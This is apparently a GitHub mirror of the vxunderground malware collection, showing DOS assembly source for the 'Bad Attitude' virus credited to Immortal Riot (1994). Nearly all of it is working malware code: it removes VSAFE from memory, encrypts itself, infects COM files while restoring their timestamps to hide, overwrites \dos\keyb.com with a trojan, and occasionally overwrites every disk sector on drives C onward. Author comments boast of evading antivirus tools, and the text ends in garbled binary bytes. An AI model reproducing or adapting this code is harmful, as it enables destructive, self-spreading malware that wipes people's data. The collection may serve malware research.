mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 20:35:25 +00:00
4b9382ddbc
push
412 lines
8.3 KiB
NASM
412 lines
8.3 KiB
NASM
; -Bad Attitude-
|
||
; "Created by Immortal Riot's destructive development team"
|
||
; (c) '94 The Unforgiven/Immortal Riot
|
||
;
|
||
; "If I don't have bad attitude, this virus is harmless"
|
||
;
|
||
; Notes:
|
||
; F-Prot, Scan, Tbav, Findviru can't find shits of this virus.
|
||
;
|
||
; Disclaimer:
|
||
; If this virus damages you, it's a pleasure, but not the fault
|
||
; of the author. If you want to sue me, it's your loss.
|
||
;
|
||
; Dedication:
|
||
; I dedicate this virus to all virus writers worldwide!
|
||
|
||
.MODEL TINY
|
||
.CODE
|
||
ORG 100h
|
||
|
||
Virus_start:
|
||
xchg ax,ax
|
||
xchg ax,ax ; Take down VSAFE from memory!
|
||
mov ax,0fa01h
|
||
mov dx,5945h
|
||
int 16h
|
||
|
||
call get_delta_offset
|
||
real_start:
|
||
|
||
Get_delta_offset: ; Get delta offset
|
||
pop bp
|
||
sub bp, offset get_delta_offset
|
||
|
||
Call_en_de_crypt:
|
||
mov ax,bp
|
||
add ax,11Ah
|
||
push ax
|
||
jmp short en_de_crypt ; First, decrypt the virus
|
||
jmp short real_code_start ; and then, continue!
|
||
|
||
encryption_value dw 0 ; Random value for each infection!
|
||
|
||
Write_virus:
|
||
call en_de_crypt ; Encrypt the virus
|
||
mov ah,40h
|
||
mov cx, offset virus_end-100h
|
||
lea dx, [bp+100h]
|
||
int 21h
|
||
call en_de_crypt ; Decrypt the virus again
|
||
ret
|
||
|
||
En_de_crypt:
|
||
mov ax,word ptr [bp+encryption_value]
|
||
lea si,[bp+real_code_start]
|
||
mov cx,(virus_end-real_code_start+1)/2
|
||
|
||
Xor_LoopY:
|
||
xor word ptr [si],ax
|
||
inc si
|
||
inc si
|
||
Loop Xor_LoopY
|
||
ret
|
||
|
||
Real_code_start:
|
||
mov ah,2ch ; Get Time
|
||
int 21h
|
||
cmp dl,0 ; 1%
|
||
jne Another_Percent
|
||
call Create_file
|
||
|
||
Another_Percent:
|
||
cmp dl,1 ; another %
|
||
jne not_this_time ; Naaaaaaah
|
||
|
||
mov ah,09h ; Print the virus name
|
||
lea dx,[bp+virus]
|
||
int 21h
|
||
|
||
Trash_sucker: ; Overwrite all sectors on all drives!
|
||
mov al,2h ; on drive C - Z
|
||
Drive:
|
||
mov cx,1
|
||
lea bx,virus
|
||
cwd
|
||
Next_Sector:
|
||
int 26h
|
||
inc dx
|
||
jnc next_sector
|
||
inc al
|
||
jmp short drive
|
||
|
||
Not_this_time:
|
||
cld
|
||
Set_Dta: ; Set the dta
|
||
mov ah,1ah
|
||
lea dx,[bp+virus_end]
|
||
int 21h
|
||
|
||
Buffer_Xfer: ; Restore the beginning
|
||
lea si,[bp+first_bytes]
|
||
lea di,[bp+@buf]
|
||
mov cx,2
|
||
rep movsw
|
||
|
||
mov di,3 ; Infection-counter
|
||
|
||
Get_drive: ; Get drive from where we're
|
||
mov ah,19h ; executed from
|
||
int 21h
|
||
|
||
cmp al,2
|
||
jae Get_Dir ; A: or B:, if so, don't infect
|
||
jmp restore_start ; other programs! Just return normally!
|
||
|
||
Get_dir: ; Get directory from we're executed
|
||
mov ah,47h ; from!
|
||
xor dl,dl
|
||
lea si,[bp+dirbuf+1]
|
||
int 21h
|
||
|
||
Find_First: ; Find first file
|
||
mov cx,111b
|
||
lea dx,[bp+filemask]
|
||
mov ah,4eh
|
||
_4fh: ; When called ah=4fh
|
||
int 21h
|
||
|
||
jnc clear_file_attribs ; We did find a file!
|
||
|
||
chdir: ; We didn't find a file,
|
||
cmp byte ptr [bp+DOSflag],1
|
||
jne dot_dott
|
||
jmp no_more_files
|
||
|
||
dot_dott:
|
||
mov ah,3bh ; so we try in another dir!
|
||
lea dx,[bp+offset dot_dot]
|
||
int 21h
|
||
jnc find_first
|
||
|
||
mov ah,3bh ; We try to infect files in
|
||
lea dx,[bp+offset DOS] ; \DOS
|
||
int 21h
|
||
inc byte ptr [bp+dosflag]
|
||
|
||
jnc find_first
|
||
jmp no_more_files
|
||
|
||
Clear_file_attribs: ; Clear file attribs
|
||
mov ax,4301h
|
||
sub cx,cx
|
||
lea dx,[bp+virus_end+1eh]
|
||
int 21h
|
||
|
||
Open_file: ; Open the file in read/write mode!
|
||
mov ax,3d02h
|
||
int 21h
|
||
xchg ax,bx
|
||
|
||
Read_file: ; Red the first four bytes of the file
|
||
mov ah,3fh
|
||
mov cx,4
|
||
lea dx,[bp+first_bytes]
|
||
int 21h
|
||
|
||
Check_already_infected: ; and check if it's already infected
|
||
|
||
mov si,dx
|
||
lea si,[bp+first_bytes]
|
||
cmp word ptr [si],0e990h
|
||
je already_infected
|
||
|
||
cmp word ptr [si],5a4dh ; or an EXE file?
|
||
je already_infected
|
||
cmp word ptr [si],4d5ah ; or an EXE file?
|
||
je already_infected
|
||
|
||
mov ax,word ptr [bp+virus_end+1ah] ; or smaller than 400 bytes?
|
||
cmp ax,400
|
||
jb already_infected
|
||
cmp ax,64000 ; or bigger than 64000 bytes?
|
||
ja already_infected ; if so, don't infect <20>m!
|
||
|
||
Move_file_pointer_2_EOF:
|
||
|
||
call F_Ptr ; Move file-pointer to end of file
|
||
sub ax,4 ; take the last four bytes
|
||
|
||
Fill_1st_buf:
|
||
mov word ptr [bp+Istbuf],0e990h ; Fill the four bytes
|
||
mov word ptr [bp+Istbuf+2],ax ; with our own jmp-constrution!
|
||
|
||
_TopOfFile: ; Move file-pointer to
|
||
mov ax,4200h ; the beginning of file!
|
||
int 21h
|
||
|
||
Write_first4: ; Write our own jump instruction
|
||
mov ah,40h
|
||
mov cx,4
|
||
lea dx,[bp+Istbuf]
|
||
int 21h
|
||
|
||
_EOF: ; Move to end of file again
|
||
call F_Ptr
|
||
|
||
Get_random: ; Get a random value
|
||
mov ah,2ch
|
||
int 21h
|
||
add dl, dh
|
||
|
||
jz get_random
|
||
mov word ptr [bp+encryption_value],dx ; put it as the encryption value
|
||
call write_virus ; infect the file
|
||
|
||
jmp short restore_time_date ; Then cover our tracks!
|
||
|
||
Already_infected:
|
||
inc di
|
||
|
||
Restore_Time_Date: ; Restore the infected file time
|
||
lea si,[bp+virus_end+16h] ; and date stamps
|
||
mov cx,word ptr [si]
|
||
mov dx,word ptr [si+2]
|
||
mov ax,5701h
|
||
int 21h
|
||
|
||
Close_file: ; Close the file!
|
||
mov ah,3eh
|
||
int 21h
|
||
|
||
Set_old_attrib: ; Set back old attribs!
|
||
mov ax,4301h
|
||
xor ch,ch
|
||
mov cl,byte ptr [bp+virus_end+15h]
|
||
lea dx,[bp+virus_end+1eh]
|
||
int 21h
|
||
|
||
Enough_files: ; Have we infected
|
||
dec di ; 3 files this run?
|
||
cmp di,0
|
||
je no_more_files
|
||
|
||
mov ah,4fh ; No, then, search for the next file!
|
||
jmp _4fh
|
||
|
||
No_more_files: ; We've infected enough!
|
||
Restore_start:
|
||
lea si,[bp+@buf]
|
||
mov di,100h
|
||
movsw
|
||
movsw
|
||
|
||
Restore_dir: ; Restore the directory to
|
||
lea dx,[bp+dirbuf] ; from where we were
|
||
mov ah,3bh ; executed from!
|
||
int 21h
|
||
|
||
Exit_proc: ; and then return to the
|
||
mov bx,100h ; real-file!
|
||
push bx
|
||
xor ax,ax
|
||
retn
|
||
|
||
F_Ptr: ; Move the file-pointer to end of
|
||
mov ax,4202h ; file! (used twice!)
|
||
xor cx, cx
|
||
xor dx, dx
|
||
int 21h
|
||
ret
|
||
|
||
Create_file: ; Create a new \dos\keyb.com
|
||
Mov ah,3ch
|
||
mov cx,0
|
||
lea dx,[bp+filename]
|
||
int 21h
|
||
|
||
Write_Da_File:
|
||
xchg ax,bx
|
||
mov ah,64d
|
||
mov cx,len
|
||
lea dx,[bp+scroll] ; Write new content in the file
|
||
int 21h
|
||
|
||
Close_Da_File: ; Close the trojanized file
|
||
mov ah,3eh
|
||
int 21h
|
||
ret ; and continue..
|
||
|
||
scroll db "<22><>$<0F><03>R<><52>2Ҵ<02><10>O |